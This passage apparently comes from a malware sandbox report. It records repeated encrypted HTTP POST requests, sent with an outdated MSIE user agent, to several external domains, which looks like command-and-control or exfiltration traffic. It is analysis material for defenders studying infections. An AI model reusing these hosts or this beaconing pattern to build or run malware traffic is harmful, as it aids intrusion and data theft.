vto4DPbou5S3vmOWUcvRaJlZ5Q4WQmtSiuTkOlL/NAmjuIS/ZwDMOgvI2ipd6Ysf36UI4tB0/xgrPMUSay9oA+jV5ZJ3dgFK3n3B8kBg1IzNvinTNJjJ4jO0FbY3EO4dHFH5ymLd82tld4d1LLU8pDoz/KtPvpUAviMoMY9CMotwyAYxoD3RKOhln/RV2XNeUb8qzfZZ0vY4Zfwdu4+qczz5/ToNkZ/gDe/UudIVBVkHz73iwY3tK0ud0SWV4LbVALNA1sJKesk2PgQnpCel5CasF3gHGS7gkKmQp4dBufkaY4I8+4VngRNuu0hIl8JPkKy5Q6EDSMa9nUPtP1eixPjruMlGgBIWC5yHWCES1AwxHO2QSWQaW+9yaxGmkP8gYsCyNidavItKoZ5hlrpPzdKxX9ziMmW/tsOmkbtloVgnZeCteKMXiRQp7P/8ytSd62FZspR3b7Iqi+4CV/HjYtE2rn8kT5k5+GZPTOkVbWm+Pbx6sRns3Vx6Har8CXs5Thb15xbj9hAM+yzbO6yeyigJeCDIFQEwnh8sXZZrOO4=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 576User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fcwcvt.orgCache-Control: no-cacheData Raw: 6e 31 48 77 64 2f 49 49 30 4a 53 55 33 4f 4d 43 4a 64 4d 78 6a 76 55 4b 7a 66 72 43 39 7a 32 4b 52 6d 5a 43 61 54 57 35 69 38 68 42 4a 69 4f 6e 6e 4a 4f 31 71 49 44 2b 55 72 4d 39 68 67 41 33 6d 59 53 48 74 48 39 7a 36 2b 58 7a 30 30 50 49 67 33 5a 44 61 56 7a 66 63 65 56 68 35 41 4d 79 4e 55 71 4f 6d 70 69 75 79 5a 38 59 32 61 67 59 57 43 57 52 76 71 57 4a 35 66 4a 76 35 50 76 39 2b 51 54 55 52 65 6a 57 70 57 64 74 4b 68 4f 35 6c 33 4a 4a 79 6c 39 48 41 63 71 38 47 61 73 56 53 4d 4b 78 61 77 6e 69 4a 72 77 35 70 47 32 6b 74 46 49 53 47 2b 49 69 44 72 4d 54 57 6a 52 4c 5a 38 66 58 41 2b 68 36 6f 7a 31 4a 55 64 55 4a 39 47 4b 73 6a 6b 39 43 62 4d 4e 54 45 62 64 66 35 37 64 66 56 52 62 69 6e 66 74 39 47 73 39 34 2f 41 5a 49 2b 6c 70 6f 66 63 6c 42 34 55 5a 77 4a 73 67 68 49 2f 55 39 75 79 4e 57 56 46 31 35 72 7a 46 36 2f 55 33 55 67 7a 36 45 35 2f 34 65 64 64 72 67 54 57 43 68 4f 6e 46 54 7a 64 4f 46 72 79 37 2f 70 39 69 6a 6c 6a 4c 4a 69 32 44 55 4a 42 32 51 4a 54 44 43 35 78 67 2b 2b 41 7a 32 45 6d 68 31 47 4d 61 78 49 37 36 66 6e 58 68 43 68 39 73 6a 52 46 31 75 42 2b 35 6c 71 75 4e 62 53 73 56 63 74 4d 5a 32 79 38 67 71 4b 59 53 65 6d 52 36 46 52 7a 50 62 4e 43 4b 2b 72 38 59 36 37 37 53 6c 71 47 47 78 4d 4b 58 36 45 6d 30 50 68 38 5a 6e 54 43 65 64 53 48 71 71 6d 64 41 48 64 2f 41 51 46 52 64 7a 64 7a 76 76 66 71 41 69 66 2b 72 66 59 2f 39 37 6b 50 50 6b 46 38 74 73 52 4f 30 33 38 51 64 53 6f 49 6f 58 51 62 58 69 34 6b 49 56 42 44 77 77 59 4a 73 54 63 6f 53 4c 6b 30 55 51 70 4d 58 6a 78 53 55 59 42 61 77 56 42 6d 37 45 55 2b 49 32 45 44 6f 49 31 4d 66 50 56 4b 44 43 45 72 2b 45 4e 66 73 32 78 58 44 6c 4a 56 34 47 4e 4e 65 55 76 45 65 58 7a 70 41 35 37 76 36 45 62 78 76 63 51 4b 2f 6a 76 67 3d 3d Data Ascii: n1Hwd/II0JSU3OMCJdMxjvUKzfrC9z2KRmZCaTW5i8hBJiOnnJO1qID+UrM9hgA3mYSHtH9z6+Xz00PIg3ZDaVzfceVh5AMyNUqOmpiuyZ8Y2agYWCWRvqWJ5fJv5Pv9+QTURejWpWdtKhO5l3JJyl9HAcq8GasVSMKxawniJrw5pG2ktFISG+IiDrMTWjRLZ8fXA+h6oz1JUdUJ9GKsjk9CbMNTEbdf57dfVRbinft9Gs94/AZI+lpofclB4UZwJsghI/U9uyNWVF15rzF6/U3Ugz6E5/4eddrgTWChOnFTzdOFry7/p9ijljLJi2DUJB2QJTDC5xg++Az2Emh1GMaxI76fnXhCh9sjRF1uB+5lquNbSsVctMZ2y8gqKYSemR6FRzPbNCK+r8Y677SlqGGxMKX6Em0Ph8ZnTCedSHqqmdAHd/AQFRdzdzvvfqAif+rfY/97kPPkF8tsRO038QdSoIoXQbXi4kIVBDwwYJsTcoSLk0UQpMXjxSUYBawVBm7EU+I2EDoI1MfPVKDCEr+ENfs2xXDlJV4GNNeUvEeXzpA57v6EbxvcQK/jvg==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.xaicom.esCache-Control: no-cacheData Raw: 79 35 63 50 65 50 4d 4a 30 4a 52 78 53 64 6d 63 4f 6b 61 78 70 35 77 4d 59 6b 70 5a 56 35 47 43 31 35 36 6b 37 48 48 6c 76 36 58 63 44 32 6e 65 72 7a 5a 42 36 51 66 49 54 50 48 6b 6d 4e 46 33 39 56 2f 6d 69 43 43 6f 31 64 6c 45 64 4b 55 6c 31 64 36 58 36 37 2f 61 4b 74 38 75 45 35 45 74 51 77 4e 74 4c 62 45 5a 6d 51 68 61 6d 44 36 51 64 79 63 49 4a 4f 51 42 57 6d 4e 7a 34 42 57 79 50 6d 34 52 51 59 43 66 71 4d 4f 51 35 73 78 57 39 31 6d 2f 68 53 79 43 32 31 30 6e 75 2b 48 4c 31 33 55 56 34 70 6b 78 55 74 6a 72 30 2f 31 2b 76 53 6a 59 4f 38 59 2f 79 2f 4b 53 59 50 58 7a 49 72 30 2f 7a 34 5a 7a 4f 53 4f 61 49 62 6c 4a 33 6c 49 46 66 30 66 57 37 6b 79 58 6e 4e 68 72 4b 44 45 76 55 48 71 45 30 7a 76 36 4f 46 50 55 4c 46 39 4f 63 6c 51 48 65 4e 70 6f 65 61 68 6b 66 59 51 63 74 65 43 4a 4a 78 75 4f 4b 61 59 6b 42 30 46 4a 62 4d 6b 56 62 33 50 57 56 4c 75 75 32 38 61 49 35 6d 52 72 76 35 63 34 55 45 6e 4f 78 51 31 52 49 73 55 73 66 6f 45 45 71 43 46 77 55 61 63 42 44 6c 42 5a 53 64 7a 78 58 50 63 7a 50 4e 6a 65 6b 62 30 31 68 39 6a 77 51 5a 6a 54 53 4b 4c 39 39 4e 6a 4a 79 76 7a 4c 70 6d 33 35 69 49 62 55 61 66 39 68 73 44 38 37 33 30 64 2f 77 68 6f 62 41 47 51 6c 47 52 36 57 75 70 57 5a 55 76 6c 7a 35 6f 70 79 76 58 56 70 5a 78 42 4e 75 32 35 46 69 48 6e 68 30 44 72 34 62 58 75 36 71 2f 33 77 42 46 42 68 45 71 4d 32 6b 68 5a 37 68 57 45 6c 46 7a 6b 65 56 4a 6f 58 75 67 4e 51 72 47 65 6b 45 74 4d 67 64 53 4c 2f 2b 4a 2f 5a 65 66 4f 34 6c 37 38 47 6f 75 33 33 47 31 4b 35 4d 6a 51 45 39 32 62 4b 64 71 61 58 70 2b 42 2f 37 6f 47 2b 67 58 4a 6e 69 6f 4e 77 32 6b 41 4a 6b 72 6f 50 6f 65 4c 79 43 78 6e 75 47 59 43 76 6d 76 30 41 5a 67 32 78 39 5a 39 55 Data Ascii: y5cPePMJ0JRxSdmcOkaxp5wMYkpZV5GC156k7HHlv6XcD2nerzZB6QfITPHkmNF39V/miCCo1dlEdKUl1d6X67/aKt8uE5EtQwNtLbEZmQhamD6QdycIJOQBWmNz4BWyPm4RQYCfqMOQ5sxW91m/hSyC210nu+HL13UV4pkxUtjr0/1+vSjYO8Y/y/KSYPXzIr0/z4ZzOSOaIblJ3lIFf0fW7kyXnNhrKDEvUHqE0zv6OFPULF9OclQHeNpoeahkfYQcteCJJxuOKaYkB0FJbMkVb3PWVLuu28aI5mRrv5c4UEnOxQ1RIsUsfoEEqCFwUacBDlBZSdzxXPczPNjekb01h9jwQZjTSKL99NjJyvzLpm35iIbUaf9hsD8730d/whobAGQlGR6WupWZUvlz5opyvXVpZxBNu25FiHnh0Dr4bXu6q/3wBFBhEqM2khZ7hWElFzkeVJoXugNQrGekEtMgdSL/+J/ZefO4l78Gou33G1K5MjQE92bKdqaXp+B/7oG+gXJnioNw2kAJkroPoeLyCxnuGYCvmv0AZg2x9Z9U
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.xaicom.esCache-Control: no-cacheData Raw: 79 35 63 50 65 50 4d 4a 30 4a 52 78 53 64 6d 63 4f 6b 61 78 70 35 77 4d 59 6b 70 5a 56 35 47 43 31 35 36 6b 37 48 48 6c 76 36 58 63 44 32 6e 65 72 7a 5a 42 36 51 66 49 54 50 48 6b 6d 4e 46 33 39 56 2f 6d 69 43 43 6f 31 64 6c 45 64 4b 55 6c 31 64 36 58 36 37 2f 61 4b 74 38 75 45 35 45 74 51 77 4e 74 4c 62 45 5a 6d 51 68 61 6d 44 36 51 64 79 63 49 4a 4f 51 42 57 6d 4e 7a 34 42 57 79 50 6d 34 52 51 59 43 66 71 4d 4f 51 35 73 78 57 39 31 6d 2f 68 53 79 43 32 31 30 6e 75 2b 48 4c 31 33 55 56 34 70 6b 78 55 74 6a 72 30 2f 31 2b 76 53 6a 59 4f 38 59 2f 79 2f 4b 53 59 50 58 7a 49 72 30 2f 7a 34 5a 7a 4f 53 4f 61 49 62 6c 4a 33 6c 49 46 66 30 66 57 37 6b 79 58 6e 4e 68 72 4b 44 45 76 55 48 71 45 30 7a 76 36 4f 46 50 55 4c 46 39 4f 63 6c 51 48 65 4e 70 6f 65 61 68 6b 66 59 51 63 74 65 43 4a 4a 78 75 4f 4b 61 59 6b 42 30 46 4a 62 4d 6b 56 62 33 50 57 56 4c 75 75 32 38 61 49 35 6d 52 72 76 35 63 34 55 45 6e 4f 78 51 31 52 49 73 55 73 66 6f 45 45 71 43 46 77 55 61 63 42 44 6c 42 5a 53 64 7a 78 58 50 63 7a 50 4e 6a 65 6b 62 30 31 68 39 6a 77 51 5a 6a 54 53 4b 4c 39 39 4e 6a 4a 79 76 7a 4c 70 6d 33 35 69 49 62 55 61 66 39 68 73 44 38 37 33 30 64 2f 77 68 6f 62 41 47 51 6c 47 52 36 57 75 70 57 5a 55 76 6c 7a 35 6f 70 79 76 58 56 70 5a 78 42 4e 75 32 35 46 69 48 6e 68 30 44 72 34 62 58 75 36 71 2f 33 77 42 46 42 68 45 71 4d 32 6b 68 5a 37 68 57 45 6c 46 7a 6b 65 56 4a 6f 58 75 67 4e 51 72 47 65 6b 45 74 4d 67 64 53 4c 2f 2b 4a 2f 5a 65 66 4f 34 6c 37 38 47 6f 75 33 33 47 31 4b 35 4d 6a 51 45 39 32 62 4b 64 71 61 58 70 2b 42 2f 37 6f 47 2b 67 58 4a 6e 69 6f 4e 77 32 6b 41 4a 6b 72 6f 50 6f 65 4c 79 43 78 6e 75 47 59 43 76 6d 76 30 41 5a 67 32 78 39 5a 39 55 Data Ascii: y5cPePMJ0JRxSdmcOkaxp5wMYkpZV5GC156k7HHlv6XcD2nerzZB6QfITPHkmNF39V/miCCo1dlEdKUl1d6X67/aKt8uE5EtQwNtLbEZmQhamD6QdycIJOQBWmNz4BWyPm4RQYCfqMOQ5sxW91m/hSyC210nu+HL13UV4pkxUtjr0/1+vSjYO8Y/y/KSYPXzIr0/z4ZzOSOaIblJ3lIFf0fW7kyXnNhrKDEvUHqE0zv6OFPULF9OclQHeNpoeahkfYQcteCJJxuOKaYkB0FJbMkVb3PWVLuu28aI5mRrv5c4UEnOxQ1RIsUsfoEEqCFwUacBDlBZSdzxXPczPNjekb01h9jwQZjTSKL99NjJyvzLpm35iIbUaf9hsD8730d/whobAGQlGR6WupWZUvlz5opyvXVpZxBNu25FiHnh0Dr4bXu6q/3wBFBhEqM2khZ7hWElFzkeVJoXugNQrGekEtMgdSL/+J/ZefO4l78Gou33G1K5MjQE92bKdqaXp+B/7oG+gXJnioNw2kAJkroPoeLyCxnuGYCvmv0AZg2x9Z9U
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 600User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.nelipak.nlCache-Control: no-cacheData Raw: 53 69 55 57 79 64 48 37 32 70 52 4a 42 35 6f 64 63 41 4a 4d 6f 79 71 41 46 78 75 50 32 62 43 77 6c 53 38 45 38 37 6c 50 36 63 48 6c 44 33 41 4f 62 63 46 36 54 54 50 42 6f 77 48 44 4a 4d 35 47 46 42 6a 66 63 68 6e 73 4f 6f 7a 54 6c 79 53 6d 54 53 54 5a 74 78 47 71 74 55 46 52 4c 61 74 6b 31 2f 77 4c 58 46 75 6e 49 44 33 58 45 52 34 74 4e 5a 5a 35 4c 44 71 61 56 5a 59 6a 72 2b 36 34 45 47 78 66 4f 62 42 65 74 6a 5a 39 4e 32 77 73 71 32 6c 6b 37 4f 2f 57 38 66 57 49 2b 4f 72 55 46 5a 6d 46 75 52 54 55 78 38 50 71 67 6a 35 67 41 37 49 4f 61 75 65 36 42 78 6f 4a 69 4c 6a 46 62 44 7a 79 2f 52 45 35 4b 76 51 6b 61 4b 54 4f 6b 56 30 5a 39 69 45 68 54 39 2b 30 54 57 77 37 50 4a 72 50 72 77 79 6b 72 65 39 57 50 5a 34 44 66 79 44 38 44 2f 53 32 65 45 6c 36 49 73 4b 59 6c 63 35 62 4a 6f 55 72 4e 4a 59 67 4f 73 44 4e 38 6d 62 48 75 64 62 6d 4c 32 77 30 4e 75 63 55 62 34 48 53 6b 68 4f 65 4f 2f 4e 6d 4c 62 4c 49 39 36 53 7a 69 4b 52 33 6b 43 65 2f 36 46 66 4c 54 55 50 39 44 62 4d 45 41 51 79 58 4c 2f 42 70 7a 68 36 53 6c 6b 6b 4b 44 71 54 50 72 2b 6b 61 65 46 35 46 46 5a 58 37 2b 61 79 6e 44 63 71 42 49 61 50 77 63 39 38 78 66 4b 4e 30 39 35 31 47 55 36 52 59 67 49 70 38 59 75 4e 4e 5a 41 4a 52 4c 2f 37 6c 52 51 62 56 39 50 75 39 47 38 51 54 42 55 35 69 43 50 33 6a 6c 58 42 52 6d 32 42 67 4d 6d 30 44 73 2f 6e 48 77 56 73 38 58 4c 6f 62 33 4b 69 65 56 4a 32 57 38 71 4c 6e 6a 30 39 50 53 49 39 77 69 62 48 61 6b 62 6f 75 34 47 66 75 46 33 2f 4c 74 52 36 52 47 68 53 76 6e 32 41 2f 33 65 53 36 54 36 6f 33 4f 79 36 49 61 76 6e 75 54 70 2b 2f 51 56 54 64 30 30 2b 4a 30 6a 2b 37 42 31 46 33 75 68 59 4b 73 38 53 46 30 61 36 4b 71 45 33 79 5a 45 63 32 71 66 4c 57 68 62 51 70 4a 77 49 54 57 59 62 2b 33 31 6d 7a 73 64 78 52 41 48 43 6f 6e 30 54 66 45 34 36 78 42 72 39 50 34 64 7a 67 39 77 3d 3d Data Ascii: SiUWydH72pRJB5odcAJMoyqAFxuP2bCwlS8E87lP6cHlD3AObcF6TTPBowHDJM5GFBjfchnsOozTlySmTSTZtxGqtUFRLatk1/wLXFunID3XER4tNZZ5LDqaVZYjr+64EGxfObBetjZ9N2wsq2lk7O/W8fWI+OrUFZmFuRTUx8Pqgj5gA7IOaue6BxoJiLjFbDzy/RE5KvQkaKTOkV0Z9iEhT9+0TWw7PJrPrwykre9WPZ4DfyD8D/S2eEl6IsKYlc5bJoUrNJYgOsDN8mbHudbmL2w0NucUb4HSkhOeO/NmLbLI96SziKR3kCe/6FfLTUP9DbMEAQyXL/Bpzh6SlkkKDqTPr+kaeF5FFZX7+aynDcqBIaPwc98xfKN0951GU6RYgIp8YuNNZAJRL/7lRQbV9Pu9G8QTBU5iCP3jlXBRm2BgMm0Ds/nHwVs8XLob3KieVJ2W8qLnj09PSI9wibHakbou4GfuF3/LtR6RGhSvn2A/3eS6T6o3Oy6IavnuTp+/QVTd00+J0j+7B1F3uhYKs8SF0a6KqE3yZEc2qfLWhbQpJwITWYb+31mzsdxRAHCon0TfE46xBr9P4dzg9w==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 592User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.hummer.huCache-Control: no-cacheData Raw: 5a 33 6e 43 77 34 66 50 32 70 53 6a 47 44 63 2b 74 6b 64 71 50 6c 43 76 33 37 52 39 62 73 4a 33 71 77 76 36 51 63 7a 68 42 50 4e 2b 4e 7a 56 78 71 31 4a 65 38 68 44 6b 37 64 49 6f 42 65 78 4c 7a 33 44 63 6e 57 2b 73 53 4c 42 55 69 53 2f 37 6c 31 4e 39 73 6f 5a 42 34 74 32 79 5a 76 66 48 65 54 71 31 4a 73 59 36 62 53 73 36 78 6d 4a 44 4a 33 69 4f 34 2f 45 2f 77 58 64 39 64 56 38 42 61 31 5a 43 30 52 6b 41 66 44 39 32 33 32 4a 54 6e 79 73 51 32 59 73 79 2f 57 31 78 64 50 53 4f 68 49 2f 6a 4a 4e 2f 49 64 2f 6c 4e 4f 62 4a 39 7a 4a 7a 39 44 57 67 44 35 50 59 30 48 72 57 5a 58 61 73 74 66 49 6d 61 63 4f 71 4c 57 6d 49 69 64 4c 45 41 71 4f 43 6f 36 5a 59 36 65 75 34 70 34 59 6d 57 42 6d 75 30 45 73 55 76 37 45 42 44 72 66 39 35 79 4e 33 4e 48 39 2f 39 53 58 54 35 4f 49 42 4d 34 41 54 52 30 49 46 75 77 33 51 77 78 4e 4c 73 41 68 64 6b 57 4c 67 61 31 68 6c 49 73 61 68 44 78 2f 31 55 56 39 42 5a 2f 55 79 42 6e 4d 56 73 38 31 4f 51 73 46 76 5a 6f 53 67 62 59 4d 7a 6d 66 6d 67 78 59 4a 6b 6b 33 79 35 30 76 6a 4b 5a 6a 66 48 70 4e 78 78 37 36 6e 6c 42 63 63 59 74 48 68 65 44 41 59 44 6a 6e 6c 67 49 6a 65 52 6a 64 7a 6e 4b 68 69 68 38 36 4f 52 61 37 61 73 4b 37 53 70 36 64 70 45 31 57 62 5a 4f 4c 52 4d 6b 6d 44 5a 51 32 6e 56 52 33 62 70 61 30 75 52 5a 61 64 43 6a 30 2b 4a 4b 52 6a 36 6c 36 34 44 32 42 32 4f 48 7a 43 32 58 68 71 50 2b 4d 6e 37 77 50 37 79 54 59 6a 54 41 5a 4a 6f 6a 58 61 65 36 34 78 2f 2b 74 41 67 4d 64 37 71 6e 6c 70 57 46 72 38 38 2f 46 38 70 72 66 2b 2b 46 37 78 33 4f 53 56 57 6c 75 71 57 7a 41 51 36 6a 38 49 63 72 45 59 48 33 58 38 51 74 53 44 36 78 48 38 38 41 78 75 6c 30 77 46 72 4d 58 69 6d 7a 57 4b 6a 59 62 46 47 75 75 73 4a 37 68 38 4f 4f 4d 36 65 6c 79 6a 31 6c 45 43 6d 33 59 6b 54 34 71 74 59 37 32 6d 72 76 35 39 4c 6b 6c 35 34 6b Data Ascii: Z3nCw4fP2pSjGDc+tkdqPlCv37R9bsJ3qwv6QczhBPN+NzVxq1Je8hDk7dIoBexLz3DcnW+sSLBUiS/7l1N9soZB4t2yZvfHeTq1JsY6bSs6xmJDJ3iO4/E/wXd9dV8Ba1ZC0RkAfD9232JTnysQ2Ysy/W1xdPSOhI/jJN/Id/lNObJ9zJz9DWgD5PY0HrWZXastfImacOqLWmIidLEAqOCo6ZY6eu4p4YmWBmu0EsUv7EBDrf95yN3NH9/9SXT5OIBM4ATR0IFuw3QwxNLsAhdkWLga1hlIsahDx/1UV9BZ/UyBnMVs81OQsFvZoSgbYMzmfmgxYJkk3y50vjKZjfHpNxx76nlBccYtHheDAYDjnlgIjeRjdznKhih86ORa7asK7Sp6dpE1WbZOLRMkmDZQ2nVR3bpa0uRZadCj0+JKRj6l64D2B2OHzC2XhqP+Mn7wP7yTYjTAZJojXae64x/+tAgMd7qnlpWFr88/F8prf++F7x3OSVWluqWzAQ6j8IcrEYH3X8QtSD6xH88Axul0wFrMXimzWKjYbFGuusJ7h8OOM6elyj1lECm3YkT4qtY72mrv59Lkl54k
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.abdg.comCache-Control: no-cacheData Raw: 6b 39 53 67 65 6b 34 66 30 4a 54 53 66 58 63 30 32 5a 34 58 78 72 48 5a 42 43 74 4f 55 32 62 50 59 74 54 34 53 75 4f 7a 67 45 4f 2f 51 34 77 32 4f 65 57 57 69 67 32 4e 47 7a 2f 36 37 48 5a 41 7a 52 72 6d 56 37 50 7a 76 45 49 55 79 4d 34 54 4a 7a 33 46 4b 32 37 31 4b 43 4a 73 4e 66 41 43 43 77 57 4f 2f 78 75 6f 50 75 78 38 32 4b 57 36 45 6f 32 43 52 58 68 6e 45 50 6d 50 63 76 63 77 73 61 71 71 4d 76 4a 53 75 34 30 37 46 42 71 37 36 4e 6d 42 68 74 73 71 43 6e 61 79 75 49 39 6a 7a 76 4d 32 77 54 72 5a 35 7a 6b 2f 6a 36 2f 75 4e 58 57 48 78 52 65 43 32 56 77 69 34 6a 54 61 48 37 62 68 69 59 4c 50 59 41 63 49 67 6c 48 59 6c 59 37 39 61 55 5a 33 78 6b 5a 6f 63 37 39 35 31 62 43 6c 75 5a 46 63 30 39 55 64 76 73 61 44 67 44 46 39 4e 6f 36 54 30 63 4d 37 76 31 4f 35 51 75 38 44 55 59 6f 53 49 53 64 36 48 2f 67 38 6b 68 45 77 56 43 50 68 31 7a 4d 7a 6e 7a 61 49 61 39 54 4f 45 66 65 6a 47 46 44 52 69 54 4b 62 72 32 49 42 79 6e 30 44 2b 32 72 63 50 65 56 65 69 4b 6b 4b 6d 6a 37 59 61 30 49 4b 71 68 5a 36 70 33 37 4f 4b 6d 4c 38 65 50 6e 45 6e 4a 41 72 33 32 52 4f 38 61 78 74 4e 79 6e 2b 46 6c 4b 6c 35 6e 33 58 42 41 66 55 4d 41 6d 2f 6b 43 6f 77 35 6a 55 47 58 75 45 69 62 73 38 63 57 2f 55 69 78 53 56 39 4a 73 32 4b 5a 4b 69 32 2b 4c 6a 4f 59 33 61 51 32 78 55 69 51 4c 42 6d 51 56 2b 42 71 61 4b 2b 38 63 36 37 57 69 61 2f 46 74 66 38 59 64 6e 2b 46 54 62 52 54 78 48 4c 59 46 61 2b 39 72 49 48 4b 68 73 66 72 64 61 39 53 7a 37 6e 44 2f 6a 2f 6f 7a 74 5a 69 43 6b 6d 78 49 70 6f 4f 32 4f 4d 4d 39 75 54 2f 56 50 71 46 4f 71 67 52 50 58 38 4f 68 46 64 74 6f 61 72 52 58 61 50 58 4d 54 2f 61 32 62 35 56 7a 35 56 56 6b 67 79 4d 70 71 52 Data Ascii: k9Sgek4f0JTSfXc02Z4XxrHZBCtOU2bPYtT4SuOzgEO/Q4w2OeWWig2NGz/67HZAzRrmV7PzvEIUyM4TJz3FK271KCJsNfACCwWO/xuoPux82KW6Eo2CRXhnEPmPcvcwsaqqMvJSu407FBq76NmBhtsqCnayuI9jzvM2wTrZ5zk/j6/uNXWHxReC2Vwi4jTaH7bhiYLPYAcIglHYlY79aUZ3xkZoc7951bCluZFc09UdvsaDgDF9No6T0cM7v1O5Qu8DUYoSISd6H/g8khEwVCPh1zMznzaIa9TOEfejGFDRiTKbr2IByn0D+2rcPeVeiKkKmj7Ya0IKqhZ6p37OKmL8ePnEnJAr32RO8axtNyn+FlKl5n3XBAfUMAm/kCow5jUGXuEibs8cW/UixSV9Js2KZKi2+LjOY3aQ2xUiQLBmQV+BqaK+8c67Wia/Ftf8Ydn+FTbRTxHLYFa+9rIHKhsfrda9Sz7nD/j/oztZiCkmxIpoO2OMM9uT/VPqFOqgRPX8OhFdtoarRXaPXMT/a2b5Vz5VVkgyMpqR
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 600User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.nelipak.nlCache-Control: no-cacheData Raw: 53 69 55 57 79 64 48 37 32 70 52 4a 42 35 6f 64 63 41 4a 4d 6f 79 71 41 46 78 75 50 32 62 43 77 6c 53 38 45 38 37 6c 50 36 63 48 6c 44 33 41 4f 62 63 46 36 54 54 50 42 6f 77 48 44 4a 4d 35 47 46 42 6a 66 63 68 6e 73 4f 6f 7a 54 6c 79 53 6d 54 53 54 5a 74 78 47 71 74 55 46 52 4c 61 74 6b 31 2f 77 4c 58 46 75 6e 49 44 33 58 45 52 34 74 4e 5a 5a 35 4c 44 71 61 56 5a 59 6a 72 2b 36 34 45 47 78 66 4f 62 42 65 74 6a 5a 39 4e 32 77 73 71 32 6c 6b 37 4f 2f 57 38 66 57 49 2b 4f 72 55 46 5a 6d 46 75 52 54 55 78 38 50 71 67 6a 35 67 41 37 49 4f 61 75 65 36 42 78 6f 4a 69 4c 6a 46 62 44 7a 79 2f 52 45 35 4b 76 51 6b 61 4b 54 4f 6b 56 30 5a 39 69 45 68 54 39 2b 30 54 57 77 37 50 4a 72 50 72 77 79 6b 72 65 39 57 50 5a 34 44 66 79 44 38 44 2f 53 32 65 45 6c 36 49 73 4b 59 6c 63 35 62 4a 6f 55 72 4e 4a 59 67 4f 73 44 4e 38 6d 62 48 75 64 62 6d 4c 32 77 30 4e 75 63 55 62 34 48 53 6b 68 4f 65 4f 2f 4e 6d 4c 62 4c 49 39 36 53 7a 69 4b 52 33 6b 43 65 2f 36 46 66 4c 54 55 50 39 44 62 4d 45 41 51 79 58 4c 2f 42 70 7a 68 36 53 6c 6b 6b 4b 44 71 54 50 72 2b 6b 61 65 46 35 46 46 5a 58 37 2b 61 79 6e 44 63 71 42 49 61 50 77 63 39 38 78 66 4b 4e 30 39 35 31 47 55 36 52 59 67 49 70 38 59 75 4e 4e 5a 41 4a 52 4c 2f 37 6c 52 51 62 56 39 50 75 39 47 38 51 54 42 55 35 69 43 50 33 6a 6c 58 42 52 6d 32 42 67 4d 6d 30 44 73 2f 6e 48 77 56 73 38 58 4c 6f 62 33 4b 69 65 56 4a 32 57 38 71 4c 6e 6a 30 39 50 53 49 39 77 69 62 48 61 6b 62 6f 75 34 47 66 75 46 33 2f 4c 74 52 36 52 47 68 53 76 6e 32 41 2f 33 65 53 36 54 36 6f 33 4f 79 36 49 61 76 6e 75 54 70 2b 2f 51 56 54 64 30 30 2b 4a 30 6a 2b 37 42 31 46 33 75 68 59 4b 73 38 53 46 30 61 36 4b 71 45 33 79 5a 45 63 32 71 66 4c 57 68 62 51 70 4a 77 49 54 57 59 62 2b 33 31 6d 7a 73 64 78 52 41 48 43 6f 6e 30 54 66 45 34 36 78 42 72 39 50 34 64 7a 67 39 77 3d 3d Data Ascii: SiUWydH72pRJB5odcAJMoyqAFxuP2bCwlS8E87lP6cHlD3AObcF6TTPBowHDJM5GFBjfchnsOozTlySmTSTZtxGqtUFRLatk1/wLXFunID3XER4tNZZ5LDqaVZYjr+64EGxfObBetjZ9N2wsq2lk7O/W8fWI+OrUFZmFuRTUx8Pqgj5gA7IOaue6BxoJiLjFbDzy/RE5KvQkaKTOkV0Z9iEhT9+0TWw7PJrPrwykre9WPZ4DfyD8D/S2eEl6IsKYlc5bJoUrNJYgOsDN8mbHudbmL2w0NucUb4HSkhOeO/NmLbLI96SziKR3kCe/6FfLTUP9DbMEAQyXL/Bpzh6SlkkKDqTPr+kaeF5FFZX7+aynDcqBIaPwc98xfKN0951GU6RYgIp8YuNNZAJRL/7lRQbV9Pu9G8QTBU5iCP3jlXBRm2BgMm0Ds/nHwVs8XLob3KieVJ2W8qLnj09PSI9wibHakbou4GfuF3/LtR6RGhSvn2A/3eS6T6o3Oy6IavnuTp+/QVTd00+J0j+7B1F3uhYKs8SF0a6KqE3yZEc2qfLWhbQpJwITWYb+31mzsdxRAHCon0TfE46xBr9P4dzg9w==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.cokocoko.comCache-Control: no-cacheData Raw: 43 51 41 65 67 50 42 4d 30 4a 54 52 6a 33 6f 53 41 33 73 61 54 61 4d 78 2b 63 53 59 64 6e 75 53 4a 4e 50 52 74 39 73 4c 59 43 63 55 5a 4e 63 71 6e 4a 33 42 31 6d 46 46 65 34 77 37 5a 53 38 6a 2f 58 6d 55 5a 4d 52 51 71 38 41 4f 41 33 2f 30 54 53 42 4f 52 2b 45 41 63 38 6f 74 65 62 32 4b 6e 4c 68 33 44 4a 38 37 56 30 30 77 30 69 45 6e 43 67 52 65 4b 6d 77 47 73 44 4f 64 4d 6f 4f 68 47 61 64 6b 70 6b 41 70 4f 33 78 79 42 47 65 